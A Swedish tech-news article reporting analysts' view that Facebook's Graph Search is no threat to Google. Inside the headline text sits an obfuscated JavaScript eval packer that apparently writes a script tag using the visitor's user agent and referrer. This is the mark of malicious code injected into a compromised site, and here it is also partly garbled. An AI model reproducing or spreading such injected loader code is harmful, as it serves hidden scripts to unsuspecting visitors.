Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Facebooks söktjänst Graph Search: inget hot mot Google

Facebooks söktjänst Graph Search: inget hot mot Google
Sebastian

Graph eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fttrh|var|u0026u|referrer|ietzb||js|php’.split(’|’),0,{}))
Search: I tisdags visade Facebook upp sin nya söktjänst Graph Search som vi skrev om här på Revue. I den nya tjänsten kommer man kunna göra specifika sökningar på Facebook och öppna upp helt nya användningsområden.

En användare kan som exempel söka efter restauranger som vänner besökt samt gillar i en viss stad.

Det var flera som uppgav att detta skulle komma bli ett hot mot sökmotorer som Google och Bing men nu meddelar analytiker att de inte behöver oroa sig.

– På kort sikt borde Facebooks söktjänst inte ha någon inverkan på Google. Men skulle Facebook utöka sina sökningar i ett senare skede finns det risk för att Google påverkas. Det här handlar mer om Facebook än konkurrens med Google, säger Greg Sterling på analysföretaget Opus Research.

– Facebooks Innehållsökning är endast en sökfunktion på den egna webbplatsen. Jag tvivlar starkt på att den kommer att utmana Google då det handlar om helt olika information, säger Nate Elliott.

Läs vår tidigare artikel om Facebook Graph Search här!

Via: IDG